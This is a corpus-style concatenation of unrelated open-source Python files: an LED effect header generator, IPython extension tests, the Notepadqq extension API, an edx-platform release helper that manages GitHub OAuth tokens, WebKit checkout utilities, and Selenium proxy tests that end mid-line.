from effectgroup import EffectGroup from effectdescriptions import EffectDescriptions from myutils import Utils def generateFile(fileName,ledCount,effectGroups): f = open(fileName,'w') f.write("#ifndef H_SONG_INSTRUCTIONS\n#define H_SONG_INSTRUCTIONS\n#include \"avr/pgmspace.h\"\n#include \"song_instructions.h\"\nconst char song_instructions[] PROGMEM = {") lastTime = 0 for curEffectGroup in effectGroups: writeBuffer = "" newTime = curEffectGroup.getTimeAs10msCount() tD = newTime - lastTime lastTime = newTime writeBuffer += "0xff,\n" writeBuffer += Utils.short_to_hex(tD) + "\n" for ledIndex in range (0,ledCount): ledEffect = curEffectGroup.getLedEffect(ledIndex) tempLedBytes = generateLedEffectBytes(ledIndex,ledEffect) if tempLedBytes <> "": writeBuffer += "\t" + generateLedEffectBytes(ledIndex,ledEffect) + "\n" writeBuffer += "0xff,\n" f.write(writeBuffer) f.write("0x00,};\n#endif") #generates a string for led effect def generateLedEffectBytes(ledNumber,ledEffect): effectNumber = ledEffect[EffectGroup.INDEX_EFFECT_NUMBER] #get the real effect number #TODO we are accessing a global here, eek! print "Effect num is: " + str(effectNumber) realEffectNumber = EffectDescriptions.quickEffectLookup[effectNumber]['realId'] effectData = ledEffect[EffectGroup.INDEX_EFFECT_DATA] #if effect number is < 0, ignore it if effectNumber < 0: return "" returnStr = Utils.byte_to_hex(ledNumber) + Utils.byte_to_hex(realEffectNumber) #get the effect description effectDescr = EffectDescriptions.quickEffectLookup[effectNumber] #Depending on the data, time to output the values accordingly reqAttributes = effectDescr['reqAttributes'] attribCount = len(reqAttributes) for i in range (0,attribCount): curAttrib = reqAttributes[i] attribType = curAttrib[EffectDescriptions.INDEX_TYPE] curData = effectData[i] if(attribType == EffectDescriptions.VAR_COLOR): returnStr += Utils.short_to_hex(curData[0]) returnStr += Utils.short_to_hex(curData[1]) returnStr += Utils.short_to_hex(curData[2]) elif(attribType == EffectDescriptions.VAR_BYTE): returnStr += Utils.byte_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_WORD): returnStr += Utils.short_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_DWORD): returnStr += Utils.dword_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_HIDDEN_BYTE): returnStr += Utils.short_to_hex(int(curData)) else: print "ERROR! COULD NOT DECODE EFFECT!" return returnStr
mit
initNirvana/Easyphotos
env/lib/python3.4/site-packages/IPython/core/tests/test_extension.py
36
3025
import os.path import nose.tools as nt import IPython.testing.tools as tt from IPython.utils.syspathcontext import prepended_to_syspath from IPython.utils.tempdir import TemporaryDirectory ext1_content = """ def load_ipython_extension(ip): print("Running ext1 load") def unload_ipython_extension(ip): print("Running ext1 unload") """ ext2_content = """ def load_ipython_extension(ip): print("Running ext2 load") """ ext3_content = """ def load_ipython_extension(ip): ip2 = get_ipython() print(ip is ip2) """ def test_extension_loading(): em = get_ipython().extension_manager with TemporaryDirectory() as td: ext1 = os.path.join(td, 'ext1.py') with open(ext1, 'w') as f: f.write(ext1_content) ext2 = os.path.join(td, 'ext2.py') with open(ext2, 'w') as f: f.write(ext2_content) with prepended_to_syspath(td): assert 'ext1' not in em.loaded assert 'ext2' not in em.loaded # Load extension with tt.AssertPrints("Running ext1 load"): assert em.load_extension('ext1') is None assert 'ext1' in em.loaded # Should refuse to load it again with tt.AssertNotPrints("Running ext1 load"): assert em.load_extension('ext1') == 'already loaded' # Reload with tt.AssertPrints("Running ext1 unload"): with tt.AssertPrints("Running ext1 load", suppress=False): em.reload_extension('ext1') # Unload with tt.AssertPrints("Running ext1 unload"): assert em.unload_extension('ext1') is None # Can't unload again with tt.AssertNotPrints("Running ext1 unload"): assert em.unload_extension('ext1') == 'not loaded' assert em.unload_extension('ext2') == 'not loaded' # Load extension 2 with tt.AssertPrints("Running ext2 load"): assert em.load_extension('ext2') is None # Can't unload this assert em.unload_extension('ext2') == 'no unload function' # But can reload it with tt.AssertPrints("Running ext2 load"): em.reload_extension('ext2') def test_extension_builtins(): em = get_ipython().extension_manager with TemporaryDirectory() as td: ext3 = os.path.join(td, 'ext3.py') with open(ext3, 'w') as f: f.write(ext3_content) assert 'ext3' not in em.loaded with prepended_to_syspath(td): # Load extension with tt.AssertPrints("True"): assert em.load_extension('ext3') is None assert 'ext3' in em.loaded def test_non_extension(): em = get_ipython().extension_manager nt.assert_equal(em.load_extension('sys'), "no load function")
mit
notepadqq/NotepadqqApi_Python
notepadqq_api/notepadqq_api.py
1
3531
import asyncio import sys from notepadqq_api.message_channel import MessageChannel from notepadqq_api.message_interpreter import MessageInterpreter from notepadqq_api.stubs import Stubs class NotepadqqApi(): """Provides access to the Notepadqq Api.""" _NQQ_STUB_ID = 1 def __init__(self, socket_path=None, extension_id=None): """Construct a new Api object that can be used to invoke Notepadqq methods and to receive its events. If not provided, socket_path and extension_id are respectively sys.argv[1] and sys.argv[2] """ if socket_path is None: try: socket_path = sys.argv[1] except IndexError: raise ValueError("Socket path not provided") if extension_id is None: try: extension_id = sys.argv[2] except IndexError: raise ValueError("Extension id not provided") self._socket_path = socket_path self._extension_id = extension_id self._message_channel = MessageChannel(self._socket_path) self._message_interpreter = MessageInterpreter(self._message_channel) self._nqq = Stubs.Notepadqq(self._message_interpreter, self._NQQ_STUB_ID) def run_event_loop(self, started_callback=None): """Start the event loop. If started_callback is provided, it will be called as soon as the connection with Notepadqq is ready. """ if started_callback is not None: self.notepadqq.on('currentExtensionStarted', started_callback) loop = asyncio.get_event_loop() loop.run_until_complete(self._message_channel.start(loop, self._on_new_message)) @property def extension_id(self): """The id assigned to this extension by Notepadqq""" return self._extension_id @property def notepadqq(self): """Get an instance of the main Notepadqq object""" return self._nqq def on_window_created(self, callback): """Execute a callback for every new window. This is preferable to the "newWindow" event of Notepadqq, because it could happen that the extension isn't ready soon enough to receive the "newWindow" event for the first window. This method, instead, ensures that the passed callback will be called once and only once for each current or future window. """ captured_windows = [] # Invoke the callback for every currently open window for window in self.notepadqq.windows(): if window not in captured_windows: captured_windows.append(window) callback(window) # Each time a new window gets opened, invoke the callback. # When Notepadqq is starting and initializing all the extensions, # we might not be fast enough to receive this event: this is why # we manually invoked the callback for every currently open window. def on_new_window(window): if window not in captured_windows: callback(window) self.notepadqq.on('newWindow', on_new_window) def for_each_window(self, f): """Decorator alternative for self.on_window_created(f)""" self.on_window_created(f) return f def _on_new_message(self, msg): # Called whenever a new message is received from the channel self._message_interpreter.process_message(msg)
mit
deepsrijit1105/edx-platform
scripts/release.py
37
20364
#!/usr/bin/env python """ a release-master multitool """ from __future__ import print_function, unicode_literals import sys import argparse from datetime import date, timedelta import re import collections import functools import textwrap import json import getpass try: from path import Path as path from git import Repo, Commit from git.refs.symbolic import SymbolicReference from dateutil.parser import parse as parse_datestring import requests import yaml except ImportError: print("Error: missing dependencies! Please run this command to install them:") print("pip install path.py requests python-dateutil GitPython PyYAML") sys.exit(1) try: from pygments.console import colorize except ImportError: colorize = lambda color, text: text JIRA_RE = re.compile(r"\b[A-Z]{2,}-\d+\b") PR_BRANCH_RE = re.compile(r"remotes/edx/pr/(\d+)") def project_root(): directory = path(__file__).abspath().dirname() while not (directory / ".git").exists(): directory = directory.parent return directory PROJECT_ROOT = project_root() repo = Repo(PROJECT_ROOT) git = repo.git PEOPLE_YAML = "https://raw.githubusercontent.com/edx/repo-tools-data/master/people.yaml" class memoized(object): """ Decorator. Caches a function's return value each time it is called. If called later with the same arguments, the cached value is returned (not reevaluated). https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize """ def __init__(self, func): self.func = func self.cache = {} def __call__(self, *args): if not isinstance(args, collections.Hashable): # uncacheable. a list, for instance. # better to not cache than blow up. return self.func(*args) if args in self.cache: return self.cache[args] else: value = self.func(*args) self.cache[args] = value return value def __repr__(self): '''Return the function's docstring.''' return self.func.__doc__ def __get__(self, obj, objtype): '''Support instance methods.''' return functools.partial(self.__call__, obj) def make_parser(): parser = argparse.ArgumentParser(description="release master multitool") parser.add_argument( '--previous', '--prev', '-p', metavar="GITREV", default="edx/release", help="previous release [%(default)s]") parser.add_argument( '--current', '--curr', '-c', metavar="GITREV", default="HEAD", help="current release candidate [%(default)s]") parser.add_argument( '--date', '-d', help="expected release date: defaults to " "next Tuesday [{}]".format(default_release_date())) parser.add_argument( '--merge', '-m', action="store_true", default=False, help="include merge commits") parser.add_argument( '--table', '-t', action="store_true", default=False, help="only print table") return parser def ensure_pr_fetch(): """ Make sure that the git repository contains a remote called "edx" that has two fetch URLs; one for the main codebase, and one for pull requests. Returns True if the environment was modified in any way, False otherwise. """ modified = False remotes = git.remote().splitlines() if 'edx' not in remotes: git.remote("add", "edx", "https://github.com/edx/edx-platform.git") modified = True # it would be nice to use the git-python API to do this, but it doesn't seem # to support configurations with more than one value per key. :( edx_fetches = git.config("remote.edx.fetch", get_all=True).splitlines() pr_fetch = '+refs/pull/*/head:refs/remotes/edx/pr/*' if pr_fetch not in edx_fetches: git.config("remote.edx.fetch", pr_fetch, add=True) modified = True git.fetch("edx") return modified def get_github_creds(): """ Returns GitHub credentials if they exist, as a two-tuple of (username, token). Otherwise, return None. """ netrc_auth = requests.utils.get_netrc_auth("https://api.github.com") if netrc_auth: return netrc_auth config_file = path("~/.config/edx-release").expand() if config_file.isfile(): with open(config_file) as f: config = json.load(f) github_creds = config.get("credentials", {}).get("api.github.com", {}) username = github_creds.get("username", "") token = github_creds.get("token", "") if username and token: return (username, token) return None def create_github_creds(): """ https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization """ headers = {"User-Agent": "edx-release"} payload = { "note": "edx-release", "scopes": ["repo"], } username = raw_input("GitHub username: ") password = getpass.getpass("GitHub password: ") response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) # is the user using two-factor authentication? otp_header = response.headers.get("X-GitHub-OTP") if not response.ok and otp_header and otp_header.startswith("required;"): # get two-factor code, redo the request headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ") response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) if not response.ok: message = response.json()["message"] if message != "Validation Failed": raise requests.exceptions.RequestException(message) else: # A token called "edx-release" already exists on GitHub. # Delete it, and try again. token_id = get_github_auth_id(username, password, "edx-release") if token_id: delete_github_auth_token(username, password, token_id) response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) return (username, response.json()["token"]) def get_github_auth_id(username, password, note): """ Return the ID associated with the GitHub auth token with the given note. If no such auth token exists, return None. """ response = requests.get( "https://api.github.com/authorizations", auth=(username, password), headers={"User-Agent": "edx-release"}, ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) for auth_token in response.json(): if auth_token["note"] == "edx-release": return auth_token["id"] return None def delete_github_auth_token(username, password, token_id): response = requests.delete( "https://api.github.com/authorizations/{id}".format(id=token_id), auth=(username, password), headers={"User-Agent": "edx-release"}, ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) def ensure_github_creds(attempts=3): """ Make sure that we have GitHub OAuth credentials. This will check the user's .netrc file, as well as the ~/.config/edx-release file. If no credentials exist in either place, it will prompt the user to create OAuth credentials, and store them in ~/.config/edx-release. Returns False if we found credentials, True if we had to create them. """ if get_github_creds(): return False # Looks like we need to create the OAuth creds print("We need to set up OAuth authentication with GitHub's API. " "Your password will not be stored.", file=sys.stderr) token = None for _ in range(attempts): try: username, token = create_github_creds() except requests.exceptions.RequestException as e: print( "Invalid authentication: {}".format(e.message), file=sys.stderr, ) continue else: break if token: print("Successfully authenticated to GitHub", file=sys.stderr) if not token: print("Too many invalid authentication attempts.", file=sys.stderr) return False config_file = path("~/.config/edx-release").expand() # make sure parent directory exists config_file.parent.makedirs_p() # read existing config if it exists if config_file.isfile(): with open(config_file) as f: config = json.load(f) else: config = {} # update config if 'credentials' not in config: config["credentials"] = {} if 'api.github.com' not in config['credentials']: config["credentials"]["api.github.com"] = {} config["credentials"]["api.github.com"]["username"] = username config["credentials"]["api.github.com"]["token"] = token # write it back out with open(config_file, "w") as f: json.dump(config, f) return True def default_release_date(): """ Returns a date object corresponding to the expected date of the next release: normally, this Tuesday. """ today = date.today() TUESDAY = 2 days_until_tuesday = (TUESDAY - today.isoweekday()) % 7 return today + timedelta(days=days_until_tuesday) def parse_ticket_references(text): """ Given a commit message, return a list of all JIRA ticket references in that message. If there are no ticket references, return an empty list. """ return set(JIRA_RE.findall(text)) class DoesNotExist(Exception): def __init__(self, message, commit, branch): self.message = message self.commit = commit self.branch = branch Exception.__init__(self, message) def get_merge_commit(commit, branch="master"): """ Given a commit that was merged into the given branch, return the merge commit for that event. http://stackoverflow.com/questions/8475448/find-merge-commit-which-include-a-specific-commit """ commit_range = "{}..{}".format(commit, branch) ancestry_paths = git.rev_list(commit_range, ancestry_path=True).splitlines() first_parents = git.rev_list(commit_range, first_parent=True).splitlines() both = set(ancestry_paths) & set(first_parents) for commit_hash in reversed(ancestry_paths): if commit_hash in both: return repo.commit(commit_hash) # no merge commit! msg = "No merge commit for {commit} in {branch}!".format( commit=commit, branch=branch, ) raise DoesNotExist(msg, commit, branch) def get_pr_info(num): """ Returns the info from the GitHub API """ url = "https://api.github.com/repos/edx/edx-platform/pulls/{num}".format(num=num) username, token = get_github_creds() headers = { "Authorization": "token {}".format(token), "User-Agent": "edx-release", } response = requests.get(url, headers=headers) result = response.json() if not response.ok: raise requests.exceptions.RequestException(result["message"]) return result def get_merged_prs(start_ref, end_ref): """ Return the set of all pull requests (as integers) that were merged between the start_ref and end_ref. """ ensure_pr_fetch() start_unmerged_branches = set( branch.strip() for branch in git.branch(all=True, no_merged=start_ref).splitlines() ) end_merged_branches = set( branch.strip() for branch in git.branch(all=True, merged=end_ref).splitlines() ) merged_between_refs = start_unmerged_branches & end_merged_branches merged_prs = set() for branch in merged_between_refs: match = PR_BRANCH_RE.search(branch) if match: merged_prs.add(int(match.group(1))) return merged_prs @memoized def prs_by_email(start_ref, end_ref): """ Returns an ordered dictionary of {email: pr_list} Email is the email address of the person who merged the pull request The dictionary is alphabetically ordered by email address The pull request list is ordered by merge date """ username, token = get_github_creds() headers = { "Authorization": "token {}".format(token), "User-Agent": "edx-release", } # `emails` maps from other_emails to primary email, based on people.yaml. emails = {} people_resp = requests.get(PEOPLE_YAML, headers=headers) people_resp.raise_for_status() people = yaml.safe_load(people_resp.text) for person in people.itervalues(): if 'other_emails' in person: for other_email in person['other_emails']: emails[other_email] = person['email'] unordered_data = collections.defaultdict(set) for pr_num in get_merged_prs(start_ref, end_ref): ref = "refs/remotes/edx/pr/{num}".format(num=pr_num) branch = SymbolicReference(repo, ref) try: merge = get_merge_commit(branch.commit, end_ref) except DoesNotExist: pass # this commit will be included in the commits_without_prs table else: email = emails.get(merge.author.email, merge.author.email) if email.endswith("@users.noreply.github.com"): # A bogus GitHub address, look up their GitHub name in # people.yaml username = email.split("@")[0] try: email = people[username]['email'] except KeyError: pass unordered_data[email].add((pr_num, merge)) ordered_data = collections.OrderedDict() for email in sorted(unordered_data.keys()): ordered = sorted(unordered_data[email], key=lambda pair: pair[1].authored_date) ordered_data[email] = [num for num, merge in ordered] return ordered_data def generate_pr_table(start_ref, end_ref): """ Return a UTF-8 string corresponding to a pull request table to embed in Confluence. """ header = "|| Merged By || Author || Title || PR || JIRA || Release Notes? || Verified? ||" pr_link = "[#{num}|https://github.com/edx/edx-platform/pull/{num}]" user_link = "[@{user}|https://github.com/{user}]" rows = [header] prbe = prs_by_email(start_ref, end_ref) for email, pull_requests in prbe.items(): for i, pull_request in enumerate(pull_requests): try: pr_info = get_pr_info(pull_request) title = pr_info["title"] or "" body = pr_info["body"] or "" author = pr_info["user"]["login"] except requests.exceptions.RequestException as e: message = ( "Warning: could not fetch data for #{num}: " "{message}".format(num=pull_request, message=e.message) ) print(colorize("red", message), file=sys.stderr) title = "?" body = "?" author = "" rows.append("| {merged_by} | {author} | {title} | {pull_request} | {jira} | {release_notes} | {verified} |".format( merged_by=email if i == 0 else "", author=user_link.format(user=author) if author else "", title=title.replace("|", "\|").replace('{', '\{').replace('}', '\}'), pull_request=pr_link.format(num=pull_request), jira=", ".join(parse_ticket_references(body)), release_notes="", verified="", )) return "\n".join(rows).encode("utf8") @memoized def get_commits_not_in_prs(start_ref, end_ref): """ Return a tuple of commits that exist between start_ref and end_ref, but were not merged to the end_ref. If everyone is following the pull request process correctly, this should return an empty tuple. """ return tuple(Commit.iter_items( repo, "{start}..{end}".format(start=start_ref, end=end_ref), first_parent=True, no_merges=True, )) def generate_commit_table(start_ref, end_ref): """ Return a string corresponding to a commit table to embed in Comfluence. The commits in the table should only be commits that are not in the pull request table. """ header = "|| Author || Summary || Commit || JIRA || Release Notes? || Verified? ||" commit_link = "[commit|https://github.com/edx/edx-platform/commit/{sha}]" rows = [header] commits = get_commits_not_in_prs(start_ref, end_ref) for commit in commits: rows.append("| {author} | {summary} | {commit} | {jira} | {release_notes} | {verified} |".format( author=commit.author.email, summary=commit.summary.replace("|", "\|"), commit=commit_link.format(sha=commit.hexsha), jira=", ".join(parse_ticket_references(commit.message)), release_notes="", verified="", )) return "\n".join(rows) def generate_email(start_ref, end_ref, release_date=None): """ Returns a string roughly approximating an email. """ if release_date is None: release_date = default_release_date() prbe = prs_by_email(start_ref, end_ref) email = """ To: {emails} You merged at least one pull request for edx-platform that is going out in this upcoming release, and you are responsible for verifying those changes on the staging servers before the code is released. Please go to the release page to do so: https://openedx.atlassian.net/wiki/display/ENG/{date}+Release The staging server is: https://stage.edx.org Note that you are responsible for verifying any pull requests that you merged, whether you wrote the code or not. (If you didn't write the code, you can and should try to get the person who wrote the code to help verify the changes -- but even if you can't, you're still responsible!) If you find any bugs, please notify me and record the bugs on the release page. Thanks! By the way, if you have an @edx.org email address and are having trouble logging into stage, you may need to reset your password. If you would prefer this email be sent to a different email address of yours, send a request to oscm@edx.org with the details. """.format( emails=", ".join(prbe.keys()), date=release_date.isoformat(), ) return textwrap.dedent(email).strip() def main(): parser = make_parser() args = parser.parse_args() if isinstance(args.date, basestring): # user passed in a custom date, so we need to parse it args.date = parse_datestring(args.date).date() ensure_github_creds() if args.table: print(generate_pr_table(args.previous, args.current)) return print("Generating stage verification email and its list of recipients. This may take around a minute...") print(generate_email(args.previous, args.current, release_date=args.date).encode('UTF-8')) print("\n") print("Wiki Table:") print( "Type Ctrl+Shift+D on Confluence to embed the following table " "in your release wiki page" ) print("\n") print(generate_pr_table(args.previous, args.current)) commits_without_prs = get_commits_not_in_prs(args.previous, args.current) if commits_without_prs: num = len(commits_without_prs) plural = num > 1 print("\n") print( "There {are} {num} {commits} in this release that did not come in " "through pull requests!".format( num=num, are="are" if plural else "is", commits="commits" if plural else "commit" ) ) print("\n") print(generate_commit_table(args.previous, args.current)) if __name__ == "__main__": main()
agpl-3.0
VinceZK/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/checkout.py
119
9383
# Copyright (c) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import StringIO from webkitpy.common.config import urls from webkitpy.common.checkout.changelog import ChangeLog, parse_bug_id_from_changelog from webkitpy.common.checkout.commitinfo import CommitInfo from webkitpy.common.checkout.scm import CommitMessage from webkitpy.common.memoized import memoized from webkitpy.common.system.executive import ScriptError # This class represents the WebKit-specific parts of the checkout (like ChangeLogs). # FIXME: Move a bunch of ChangeLog-specific processing from SCM to this object. # NOTE: All paths returned from this class should be absolute. class Checkout(object): def __init__(self, scm, executive=None, filesystem=None): self._scm = scm # FIXME: We shouldn't be grabbing at private members on scm. self._executive = executive or self._scm._executive self._filesystem = filesystem or self._scm._filesystem def is_path_to_changelog(self, path): return self._filesystem.basename(path) == "ChangeLog" def _latest_entry_for_changelog_at_revision(self, changelog_path, revision): changelog_contents = self._scm.contents_at_revision(changelog_path, revision) # contents_at_revision returns a byte array (str()), but we know # that ChangeLog files are utf-8. parse_latest_entry_from_file # expects a file-like object which vends unicode(), so we decode here. # Old revisions of Sources/WebKit/wx/ChangeLog have some invalid utf8 characters. changelog_file = StringIO.StringIO(changelog_contents.decode("utf-8", "ignore")) return ChangeLog.parse_latest_entry_from_file(changelog_file) def changelog_entries_for_revision(self, revision, changed_files=None): if not changed_files: changed_files = self._scm.changed_files_for_revision(revision) # FIXME: This gets confused if ChangeLog files are moved, as # deletes are still "changed files" per changed_files_for_revision. # FIXME: For now we hack around this by caching any exceptions # which result from having deleted files included the changed_files list. changelog_entries = [] for path in changed_files: if not self.is_path_to_changelog(path): continue try: changelog_entries.append(self._latest_entry_for_changelog_at_revision(path, revision)) except ScriptError: pass return changelog_entries def _changelog_data_for_revision(self, revision): changed_files = self._scm.changed_files_for_revision(revision) changelog_entries = self.changelog_entries_for_revision(revision, changed_files=changed_files) # Assume for now that the first entry has everything we need: # FIXME: This will throw an exception if there were no ChangeLogs. if not len(changelog_entries): return None changelog_entry = changelog_entries[0] return { "bug_id": parse_bug_id_from_changelog(changelog_entry.contents()), "author_name": changelog_entry.author_name(), "author_email": changelog_entry.author_email(), "author": changelog_entry.author(), "reviewer_text": changelog_entry.reviewer_text(), "reviewer": changelog_entry.reviewer(), "contents": changelog_entry.contents(), "changed_files": changed_files, } @memoized def commit_info_for_revision(self, revision): committer_email = self._scm.committer_email_for_revision(revision) changelog_data = self._changelog_data_for_revision(revision) if not changelog_data: return None return CommitInfo(revision, committer_email, changelog_data) def bug_id_for_revision(self, revision): return self.commit_info_for_revision(revision).bug_id() def _modified_files_matching_predicate(self, git_commit, predicate, changed_files=None): # SCM returns paths relative to scm.checkout_root # Callers (especially those using the ChangeLog class) may # expect absolute paths, so this method returns absolute paths. if not changed_files: changed_files = self._scm.changed_files(git_commit) return filter(predicate, map(self._scm.absolute_path, changed_files)) def modified_changelogs(self, git_commit, changed_files=None): return self._modified_files_matching_predicate(git_commit, self.is_path_to_changelog, changed_files=changed_files) def modified_non_changelogs(self, git_commit, changed_files=None): return self._modified_files_matching_predicate(git_commit, lambda path: not self.is_path_to_changelog(path), changed_files=changed_files) def commit_message_for_this_commit(self, git_commit, changed_files=None, return_stderr=False): changelog_paths = self.modified_changelogs(git_commit, changed_files) if not len(changelog_paths): raise ScriptError(message="Found no modified ChangeLogs, cannot create a commit message.\n" "All changes require a ChangeLog. See:\n %s" % urls.contribution_guidelines) message_text = self._scm.run([self._scm.script_path('commit-log-editor'), '--print-log'] + changelog_paths, return_stderr=return_stderr) return CommitMessage(message_text.splitlines()) def recent_commit_infos_for_files(self, paths): revisions = set(sum(map(self._scm.revisions_changing_file, paths), [])) return set(map(self.commit_info_for_revision, revisions)) def suggested_reviewers(self, git_commit, changed_files=None): changed_files = self.modified_non_changelogs(git_commit, changed_files) commit_infos = sorted(self.recent_commit_infos_for_files(changed_files), key=lambda info: info.revision(), reverse=True) reviewers = filter(lambda person: person and person.can_review, sum(map(lambda info: [info.reviewer(), info.author()], commit_infos), [])) unique_reviewers = reduce(lambda suggestions, reviewer: suggestions + [reviewer if reviewer not in suggestions else None], reviewers, []) return filter(lambda reviewer: reviewer, unique_reviewers) def bug_id_for_this_commit(self, git_commit, changed_files=None): try: return parse_bug_id_from_changelog(self.commit_message_for_this_commit(git_commit, changed_files).message()) except ScriptError, e: pass # We might not have ChangeLogs. def apply_patch(self, patch): # It's possible that the patch was not made from the root directory. # We should detect and handle that case. # FIXME: Move _scm.script_path here once we get rid of all the dependencies. # --force (continue after errors) is the common case, so we always use it. args = [self._scm.script_path('svn-apply'), "--force"] if patch.reviewer(): args += ['--reviewer', patch.reviewer().full_name] self._executive.run_command(args, input=patch.contents(), cwd=self._scm.checkout_root) def apply_reverse_diff(self, revision): self._scm.apply_reverse_diff(revision) # We revert the ChangeLogs because removing lines from a ChangeLog # doesn't make sense. ChangeLogs are append only. changelog_paths = self.modified_changelogs(git_commit=None) if len(changelog_paths): self._scm.revert_files(changelog_paths) conflicts = self._scm.conflicted_files() if len(conflicts): raise ScriptError(message="Failed to apply reverse diff for revision %s because of the following conflicts:\n%s" % (revision, "\n".join(conflicts))) def apply_reverse_diffs(self, revision_list): for revision in sorted(revision_list, reverse=True): self.apply_reverse_diff(revision)
bsd-3-clause
bartolkaruza/selenium
py/test/selenium/webdriver/common/proxy_tests.py
65
5759
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest from selenium.webdriver.common.proxy import Proxy, ProxyType class ProxyTests(unittest.TestCase): MANUAL_PROXY = { 'httpProxy': 'some.url:1234', 'ftpProxy': 'ftp.proxy', 'noProxy': 'localhost, foo.localhost', 'sslProxy': 'ssl.proxy:1234', 'socksProxy': 'socks.proxy:65555', 'socksUsername': 'test', 'socksPassword': 'test', } PAC_PROXY = { 'proxyAutoconfigUrl': 'http://pac.url:1234', } AUTODETECT_PROXY = { 'autodetect': True, } def testCanAddManualProxyToDesiredCapabilities(self): proxy = Proxy() proxy.http_proxy = self.MANUAL_PROXY['httpProxy'] proxy.ftp_proxy = self.MANUAL_PROXY['ftpProxy'] proxy.no_proxy = self.MANUAL_PROXY['noProxy'] proxy.sslProxy = self.MANUAL_PROXY['sslProxy'] proxy.socksProxy = self.MANUAL_PROXY['socksProxy'] proxy.socksUsername = self.MANUAL_PROXY['socksUsername'] proxy.socksPassword = self.MANUAL_PROXY['socksPassword'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.MANUAL_PROXY.copy() proxy_capabilities['proxyType'] = 'MANUAL' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanAddAutodetectProxyToDesiredCapabilities(self): proxy = Proxy() proxy.auto_detect = self.AUTODETECT_PROXY['autodetect'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.AUTODETECT_PROXY.copy() proxy_capabilities['proxyType'] = 'AUTODETECT' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanAddPACProxyToDesiredCapabilities(self): proxy = Proxy() proxy.proxy_autoconfig_url = self.PAC_PROXY['proxyAutoconfigUrl'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.PAC_PROXY.copy() proxy_capabilities['proxyType'] = 'PAC' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanNotChangeInitializedProxyType(self): proxy = Proxy(raw={'proxyType': 'direct'}) try: proxy.proxy_type = ProxyType.SYSTEM raise Exception("Change of already initialized proxy type should raise exception") except Exception as e: pass proxy = Proxy(raw={'proxyType': ProxyType.DIRECT}) try: proxy.proxy_type = ProxyType.SYSTEM raise Exception("Change of already initialized proxy type should raise exception") except Exception as e: pass def testCanInitManualProxy(self): proxy = Proxy(raw=self.MANUAL_PROXY) self.assertEqual(ProxyType.MANUAL, proxy.proxy_type) self.assertEqual(self.MANUAL_PROXY['httpProxy'], proxy.http_proxy) self.assertEqual(self.MANUAL_PROXY['ftpProxy'], proxy.ftp_proxy) self.assertEqual(self.MANUAL_PROXY['noProxy'], proxy.no_proxy) self.assertEqual(self.MANUAL_PROXY['sslProxy'], proxy.sslProxy) self.assertEqual(self.MANUAL_PROXY['socksProxy'], proxy.socksProxy) self.assertEqual(self.MANUAL_PROXY['socksUsername'], proxy.socksUsername) self.assertEqual(self.MANUAL_PROXY['socksPassword'], proxy.socksPassword) def testCanAddAutodetectProxyToDesiredCapabilities(self): proxy = Proxy(raw=self.AUTODETECT_PROXY) self.assertEqual(ProxyType.AUTODETECT, proxy.proxy_type) self.assertEqual(self.AUTODETECT_PROXY['autodetect'], proxy.auto_detect) def testCanAddPACProxyToDesiredCapabilities(self): proxy = Proxy(raw=self.PAC_PROXY) self.assertEqual(ProxyType.PAC, proxy.proxy_type) self.assertEqual(self.PAC_PROXY['proxyAutoconfigUrl'], 